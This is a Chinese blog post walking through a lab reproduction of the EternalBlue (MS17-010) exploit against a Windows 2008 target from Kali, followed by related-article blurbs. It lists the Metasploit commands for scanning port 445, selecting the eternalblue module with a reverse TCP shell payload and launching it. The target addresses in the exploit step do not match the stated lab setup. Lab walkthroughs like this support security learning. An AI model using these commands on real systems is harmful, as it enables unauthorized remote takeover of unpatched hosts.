永恒之蓝复现

最新推荐文章于 2024-06-12 11:45:14 发布
原创 最新推荐文章于 2024-06-12 11:45:14 发布 · 842 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

一、实验环境:

  • kali攻击机—IP地址:192.168.85.156
  • Win 2008靶机—IP地址:192.168.85.152

二、实验过程:

1、扫描靶机,查看445端口是否开放;

在这里插入图片描述

2、复现

2.1> 在kali中打开METASPLOIT

打开控制平台:msfconsole平台

在这里插入图片描述2.2> 在msfconsole平台上搜索ms17-010相关模块;

search ms17-010
#搜索auxiliary/scanner/smb/smb_ms17_010 模块,进行利用。
在这里插入图片描述2.3> 利用上述模块,进行漏洞发现;

这个模块就是一个ms17-010漏洞扫描模块,利用它可以检查是否存在永恒之蓝漏洞。

命令:use auxiliary/scanner/smb/smb_ms17_010

在这里插入图片描述2.4> 查看需要配置哪些参数:show option

在这里插入图片描述
有上图可知,只需要配置rhosts这一参数,即目标地址范围或CIDR标识符。

2.5> 设置靶机的IP地址;
命令:set rhosts 192.168.85.152

在这里插入图片描述
2.6> 启动扫描;

命令:exploit

在这里插入图片描述

图中带+号表示该主机存在ms17-010漏洞

3、接下来使用漏洞利用模块来进行获得shell权限;
  • 选择模块 :use exploit/windows/smb/ms17_010_eternalblue
  • 选择payload : set payload generic/shell_reverse_tcp
  • 设置rhost(靶机ip地址): set rhost 192.168.113.137
  • 设置lhost(攻击IP地址): set lhost 192.168.113.128
  • 实施攻击 exploit

在这里插入图片描述最后结果:
在这里插入图片描述成功!!!

永恒之蓝漏洞复现(ms17-010)
渗透之路,攻防之间皆学问
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
永恒之蓝(EternalBlue)漏洞复现--详细教学
最新发布
Joker
07-19 1358
本文系统分析了“永恒之蓝”漏洞的技术原理与危害,介绍了SMBv1协议中的远程代码执行风险。通过Kali与Windows靶机复现攻击流程,包括获取Shell、提权、哈希导出、横向移动与持久化控制,并演示关键日志清除技巧。最后提供防御建议,适合红队演练及蓝队溯源防护参考。
永恒之蓝(ms17-010)复现
weixin_74020633的博客
04-12 1259
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;利用辅助模块进行扫描,该模块不会直接在攻击机和靶机之间建立访问,只负责执行扫描,嗅探,指纹识别的相关功能,以辅助渗透测试。
复现永恒之蓝
qq_45956062的博客
12-07 2349
SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源;永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。首先我们关闭win7的防火墙,不关闭防火墙后续操作可能存在问题(有可能nmap扫描不到其端口,MSF利用不了永恒之蓝漏洞)(1)用kali中的nmap 扫描网段做主机发现。
win7永恒之蓝复现(一)
qq_63831588的博客
06-12 1748
今天来记录一下我的第一个漏洞学习,win7永恒之蓝漏洞的心路历程,我会分享我学习的过程,以及我学习过程中遇到的问题,并且附上相应的解决方法,大家一起学习一起进步!我们来分析一下,首先由于永恒之蓝是基于445端口的,这里我们可以看到445是开放的(这是基本条件,如果没有开放我们要手动开放一下,不过445一般是默认开放的),其次我们可以看到下面扫到了ms17-010(永恒之蓝的漏洞代号)这个漏洞,这就说明我们的win7中有这个漏洞,我们可以进行复现
win7永恒之蓝复现(二)
qq_63831588的博客
06-12 405
永恒之蓝,payload,会话
永恒之蓝复现kaliwin7
07-19
永恒之蓝”(EternalBlue)是一种针对 Windows 操作系统的严重漏洞,该漏洞允许攻击者在无需用户交互的情况下实现远程代码执行。本次实验旨在通过模拟攻击流程,了解并掌握“永恒之蓝”漏洞的利用方法及其防御措施...
渗透基础笔记+作业(永恒之蓝复现
09-08
本文将围绕渗透测试的基础知识、永恒之蓝漏洞的复现以及渗透测试在实际中的应用进行详细探讨。 渗透测试的前期交互是整个测试流程的基础。在这一阶段,测试团队需要与客户进行充分沟通,明确测试目标和范围,并讨论...
永恒之蓝复现(个人申明,此为个人学习的笔记,可能摘录自他人的文章,而非原创)
2301_76881678的博客
03-21 2088
永恒之蓝漏洞的复现(单人版)
永恒之蓝全过程复现
Zhaokangkang123的博客
02-09 7894
超详细永恒之蓝复现教程
永恒之蓝复现与利用
m0_66890717的博客
04-14 1729
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。2、漏洞原理:永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。
永恒之蓝(MS17-010)的复现
Leslieyzz的博客
01-15 704
永恒之蓝(MS17-010)的复现
MS17-010(永恒之蓝复现
m0_52701599的博客
01-11 534
永恒之蓝漏洞复现
永恒之蓝(CVE-2017-0146)复现(超详细)
热门推荐
轻舟已过万重山
09-21 1万+
大家好,这是我来到优快云创作的第二篇博客,我在进行实战模拟时跟大家一样,找到的教程,资料都是参差不齐,要么文章含金量不高,要么不详细,跳过了很多步骤,导致我们在实战复现的过程中,遭遇了各种各样的阻碍,但是我们在搜索相关报错信息时又找不到资料,整个安全圈的技术属于只对圈内开放,难住了很多想要入门的小伙伴,所以在此之后,我会将我自己的学习路线和每次实战的思路,以及遇到的问题,都写成博客,希望能够帮到大家,也希望有大神来指导指导我,大家一起共同进步。
学习永恒之蓝复现的收获
09-01
学习永恒之蓝复现的收获包括以下几点: 首先,在复现过程中,你可以学习到如何利用已有的工具,例如Kali上的工具,来进行复现。这些工具已经为复现做好了准备,帮助你更好地理解攻击的过程和原理,并加深对Kali的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值